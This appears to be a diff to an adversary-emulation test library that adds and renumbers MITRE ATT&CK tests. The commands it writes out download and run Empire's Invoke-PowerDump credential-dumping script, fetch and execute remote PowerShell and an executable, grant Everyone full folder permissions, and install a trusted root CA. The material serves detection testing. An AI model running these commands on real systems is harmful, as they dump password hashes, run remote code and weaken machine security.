 Invoke-Webrequest -Uri "https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1" -UseBasicParsing -OutFile "$Env:Temp\PowerDump.ps1"
-Import-Module .\PowerDump.ps1
+Import-Module "$Env:Temp\PowerDump.ps1"
 Invoke-PowerDump
 ```

@@ -94,7 +94,7 @@ atomic_tests:
      Write-Host "STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON" -fore green
      Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction Ignore
      Invoke-Webrequest -Uri "https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1" -UseBasicParsing -OutFile "$Env:Temp\PowerDump.ps1"
-      Import-Module .\PowerDump.ps1
+      Import-Module "$Env:Temp\PowerDump.ps1"
      Invoke-PowerDump
    name: powershell
    elevation_required: true
@@ -8,13 +8,15 @@ File sharing over a Windows network occurs over the SMB protocol. (Citation: Wik

 - [Atomic Test #1 - Network Share Discovery](#atomic-test-1---network-share-discovery)

- [Atomic Test #2 - Network Share Discovery command prompt](#atomic-test-2---network-share-discovery-command-prompt)
+- [Atomic Test #2 - Network Share Discovery - linux](#atomic-test-2---network-share-discovery---linux)

- [Atomic Test #3 - Network Share Discovery PowerShell](#atomic-test-3---network-share-discovery-powershell)
+- [Atomic Test #3 - Network Share Discovery command prompt](#atomic-test-3---network-share-discovery-command-prompt)

- [Atomic Test #4 - View available share drives](#atomic-test-4---view-available-share-drives)
+- [Atomic Test #4 - Network Share Discovery PowerShell](#atomic-test-4---network-share-discovery-powershell)

- [Atomic Test #5 - Share Discovery with PowerView](#atomic-test-5---share-discovery-with-powerview)
+- [Atomic Test #5 - View available share drives](#atomic-test-5---view-available-share-drives)
+
+- [Atomic Test #6 - Share Discovery with PowerView](#atomic-test-6---share-discovery-with-powerview)


 <br/>
@@ -22,7 +24,7 @@ File sharing over a Windows network occurs over the SMB protocol. (Citation: Wik
 ## Atomic Test #1 - Network Share Discovery
 Network Share Discovery

-**Supported Platforms:** macOS, Linux
+**Supported Platforms:** macOS



@@ -50,7 +52,49 @@ showmount #{computer_name}
 <br/>
 <br/>

-## Atomic Test #2 - Network Share Discovery command prompt
+## Atomic Test #2 - Network Share Discovery - linux
+Network Share Discovery using smbstatus
+
+**Supported Platforms:** Linux
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| package_checker | Package checking command. Debian - dpkg -s samba | string | rpm -q samba|
+| package_installer | Package installer command. Debian - apt install samba | string | yum install -y samba|
+
+
+#### Attack Commands: Run with `bash`! 
+
+
+```bash
+smbstatus --shares
+```
+
+
+
+
+#### Dependencies:  Run with `bash`!
+##### Description: Package with smbstatus (samba) must exist on device
+##### Check Prereq Commands:
+```bash
+if #{package_checker} > /dev/null; then exit 0; else exit 1; fi 
+```
+##### Get Prereq Commands:
+```bash
+sudo #{package_installer}
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #3 - Network Share Discovery command prompt
 Network Share Discovery utilizing the command prompt. The computer name variable may need to be modified to point to a different host
 Upon execution avalaible network shares will be displayed in the powershell session

@@ -80,7 +124,7 @@ net view \\#{computer_name}
 <br/>
 <br/>

-## Atomic Test #3 - Network Share Discovery PowerShell
+## Atomic Test #4 - Network Share Discovery PowerShell
 Network Share Discovery utilizing PowerShell. The computer name variable may need to be modified to point to a different host
 Upon execution, avalaible network shares will be displayed in the powershell session

@@ -105,7 +149,7 @@ get-smbshare
 <br/>
 <br/>

-## Atomic Test #4 - View available share drives
+## Atomic Test #5 - View available share drives
 View information about all of the resources that are shared on the local computer Upon execution, avalaible share drives will be displayed in the powershell session

 **Supported Platforms:** Windows
@@ -129,7 +173,7 @@ net share
 <br/>
 <br/>

-## Atomic Test #5 - Share Discovery with PowerView
+## Atomic Test #6 - Share Discovery with PowerView
 Enumerate Domain Shares the current user has access. Upon execution, progress info about each share being scanned will be displayed.

 **Supported Platforms:** Windows
@@ -7,7 +7,6 @@ atomic_tests:
    Network Share Discovery
  supported_platforms:
  - macos
-  - linux
  input_arguments:
    computer_name:
      description: Computer name to find a mount on.
@@ -19,6 +18,34 @@ atomic_tests:
      smbutil view -g //#{computer_name}
      showmount #{computer_name}
    name: sh
+- name: Network Share Discovery - linux
+  auto_generated_guid: 875805bc-9e86-4e87-be86-3a5527315cae
+  description: |
+    Network Share Discovery using smbstatus
+  supported_platforms:
+  - linux
+  input_arguments:
+    package_checker:
+      description: Package checking command. Debian - dpkg -s samba
+      type: string
+      default: rpm -q samba
+    package_installer:
+      description: Package installer command. Debian - apt install samba
+      type: string
+      default: yum install -y samba
+  dependency_executor_name: bash
+  dependencies:
+  - description: |
+      Package with smbstatus (samba) must exist on device
+    prereq_command: |
+      if #{package_checker} > /dev/null; then exit 0; else exit 1; fi
+    get_prereq_command: |
+      sudo #{package_installer} 
+  executor:
+    command: |
+      smbstatus --shares
+    name: bash
+    elevation_require: true
 - name: Network Share Discovery command prompt
  auto_generated_guid: 20f1097d-81c1-405c-8380-32174d493bbb
  description: |
@@ -22,6 +22,8 @@ While [Malicious File](https://attack.mitre.org/techniques/T1204/002) frequently

 - [Atomic Test #7 - Headless Chrome code execution via VBA](#atomic-test-7---headless-chrome-code-execution-via-vba)

+- [Atomic Test #8 - Potentially Unwanted Applications (PUA)](#atomic-test-8---potentially-unwanted-applications-pua)
+

 <br/>

@@ -424,4 +426,39 @@ Write-Host "You will need to install Google Chrome manually to meet this require



+<br/>
+<br/>
+
+## Atomic Test #8 - Potentially Unwanted Applications (PUA)
+The Potentially Unwanted Applications (PUA) protection feature in antivirus software can identify and block PUAs from downloading and installing on endpoints in your network. These applications are not considered viruses, malware, or other types of threats, but might perform actions on endpoints that adversely affect their performance or use. This file is similar to EICAR test virus file, but is considered a Potentially Unwanted Application (PUA) instead of a VIRUS (i.e. not actually malicious, but is flagged as it to verify anti-pua protection).
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| pua_url | url to PotentiallyUnwanted.exe | url | http://amtso.eicar.org/PotentiallyUnwanted.exe|
+| pua_file | path to PotentiallyUnwanted.exe | Path | $env:TEMP/PotentiallyUnwanted.exe|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+Invoke-WebRequest #{pua_url} -OutFile #{pua_file}
+& "#{pua_file}"
+```
+
+#### Cleanup Commands:
+```powershell
+Remove-Item #{pua_file}
+```
+
+
+
+
+
 <br/>
@@ -288,3 +288,31 @@ atomic_tests:
        IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
        Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1204.002\src\chromeexec-macrocode.txt" -officeProduct "Word" -sub "ExecChrome"
    name: powershell
+
+- name: Potentially Unwanted Applications (PUA)
+  auto_generated_guid: 02f35d62-9fdc-4a97-b899-a5d9a876d295
+  description: |
+    The Potentially Unwanted Applications (PUA) protection feature in antivirus software can identify and block PUAs from downloading and installing on endpoints in your network. These applications are not considered viruses, malware, or other types of threats, but might perform actions on endpoints that adversely affect their performance or use. This file is similar to EICAR test virus file, but is considered a Potentially Unwanted Application (PUA) instead of a VIRUS (i.e. not actually malicious, but is flagged as it to verify anti-pua protection).
+
+  supported_platforms:
+          - windows
+
+  input_arguments:
+    pua_url:
+      description: url to PotentiallyUnwanted.exe
+      type: url
+      default: "http://amtso.eicar.org/PotentiallyUnwanted.exe"
+    pua_file:
+      description: path to PotentiallyUnwanted.exe
+      type: Path
+      default: "$env:TEMP/PotentiallyUnwanted.exe"
+
+  executor:
+    name: powershell
+    elevation_required: false
+    command: |
+      Invoke-WebRequest #{pua_url} -OutFile #{pua_file}
+      & "#{pua_file}"
+    cleanup_command: |
+      Remove-Item #{pua_file}
+
@@ -224,6 +224,7 @@ You can set your own path variable to "C:\*" if you prefer.
 | Name | Description | Type | Default Value | 
 |------|-------------|------|---------------|
 | path | Path of folder to recursively set permissions on | path | C:&#92;Users&#92;Public&#92;*|
+| file_path | Path of folder permission back | Path | %temp%&#92;T1222.001-folder-perms-backup.txt|


 #### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
@@ -233,9 +234,25 @@ You can set your own path variable to "C:\*" if you prefer.
 icacls "#{path}" /grant Everyone:F /T /C /Q
 ```

+#### Cleanup Commands:
+```cmd
+icacls '#{path}' /restore #{file_path} /q >nul 2>&1
+```



+#### Dependencies:  Run with `command_prompt`!
+##### Description: Backup of original folder permissions should exist (for use in cleanup commands)
+##### Check Prereq Commands:
+```cmd
+IF EXIST #{file_path} ( EXIT 0 ) ELSE ( EXIT 1 ) 
+```
+##### Get Prereq Commands:
+```cmd
+icacls #{path} /save #{file_path} /t /q >nul 2>&1
+```
+
+


 <br/>
@@ -132,7 +132,21 @@ atomic_tests:
      description: Path of folder to recursively set permissions on
      type: path
      default: 'C:\Users\Public\*'
+    file_path:
+      description: Path of folder permission back
+      type: Path
+      default: '%temp%\T1222.001-folder-perms-backup.txt'
+  dependency_executor_name: command_prompt
+  dependencies:
+  - description: |
+      Backup of original folder permissions should exist (for use in cleanup commands)
+    prereq_command: |
+      IF EXIST #{file_path} ( EXIT 0 ) ELSE ( EXIT 1 )
+    get_prereq_command: |
+      icacls #{path} /save #{file_path} /t /q >nul 2>&1
  executor:
    command: icacls "#{path}" /grant Everyone:F /T /C /Q
+    cleanup_command: |
+      icacls '#{path}' /restore #{file_path} /q >nul 2>&1
    name: command_prompt
-    elevation_required: true 
+    elevation_required: true 
@@ -75,10 +75,10 @@ Adversaries may attempt to get a listing of non-security related software that i



-#### Attack Commands: Run with `command_prompt`! 
+#### Attack Commands: Run with `sh`! 


-```cmd
+```sh
 /usr/libexec/PlistBuddy -c "print :CFBundleShortVersionString" /Applications/Safari.app/Contents/Info.plist
 /usr/libexec/PlistBuddy -c "print :CFBundleVersion" /Applications/Safari.app/Contents/Info.plist
 ```
@@ -33,7 +33,7 @@ atomic_tests:
  supported_platforms:
    - macos
  executor:
-    name: command_prompt
+    name: sh
    elevation_required: false
    command: |
      /usr/libexec/PlistBuddy -c "print :CFBundleShortVersionString" /Applications/Safari.app/Contents/Info.plist
@@ -90,14 +90,14 @@ echo sudo update-ca-certificates



-#### Dependencies:  Run with `command_prompt`!
+#### Dependencies:  Run with `sh`!
 ##### Description: Verify the certificate exists. It generates if not on disk.
 ##### Check Prereq Commands:
-```cmd
+```sh
 if [ -f #{cert_filename} ]; then exit 0; else exit 1; fi; 
 ```
 ##### Get Prereq Commands:
-```cmd
+```sh
 if [ ! -f #{key_filename} ]; then openssl genrsa -out #{key_filename} 4096; fi;
 openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj "/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com" -out #{cert_filename}
 ```
@@ -123,24 +123,24 @@ Creates a root CA with openssl
 | key_filename | Key we create that is used to create the CA certificate | Path | rootCA.key|


-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+#### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 


-```cmd
+```sh
 sudo security add-trusted-cert -d -r trustRoot -k "/Library/Keychains/System.keychain" "#{cert_filename}"
 ```




-#### Dependencies:  Run with `command_prompt`!
+#### Dependencies:  Run with `sh`!
 ##### Description: Verify the certificate exists. It generates if not on disk.
 ##### Check Prereq Commands:
-```cmd
+```sh
 if [ -f #{cert_filename} ]; then exit 0; else exit 1; fi; 
 ```
 ##### Get Prereq Commands:
-```cmd
+```sh
 if [ ! -f #{key_filename} ]; then openssl genrsa -out #{key_filename} 4096; fi;
 openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj "/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com" -out #{cert_filename}
 ```
@@ -44,7 +44,7 @@ atomic_tests:
      description: Key we create that is used to create the CA certificate
      type: Path
      default: rootCA.key
-  dependency_executor_name: command_prompt
+  dependency_executor_name: sh
  dependencies:
  - description: |
      Verify the certificate exists. It generates if not on disk.
@@ -74,7 +74,7 @@ atomic_tests:
      description: Key we create that is used to create the CA certificate
      type: Path
      default: rootCA.key
-  dependency_executor_name: command_prompt
+  dependency_executor_name: sh
  dependencies:
  - description: |
      Verify the certificate exists. It generates if not on disk.
@@ -86,7 +86,7 @@ atomic_tests:
  executor:
    command: |
      sudo security add-trusted-cert -d -r trustRoot -k "/Library/Keychains/System.keychain" "#{cert_filename}"
-    name: command_prompt
+    name: sh
    elevation_required: true
 - name: Install root CA on Windows
  auto_generated_guid: 76f49d86-5eb1-461a-a032-a480f86652f1
@@ -692,3 +692,6 @@ c75612b2-9de0-4d7c-879c-10d7b077072d
 e86f1b4b-fcc1-4a2a-ae10-b49da01458db
 10447c83-fc38-462a-a936-5102363b1c43
 fcbdd43f-f4ad-42d5-98f3-0218097e2720
+86fc3f40-237f-4701-b155-81c01c48d697
+875805bc-9e86-4e87-be86-3a5527315cae
+02f35d62-9fdc-4a97-b899-a5d9a876d295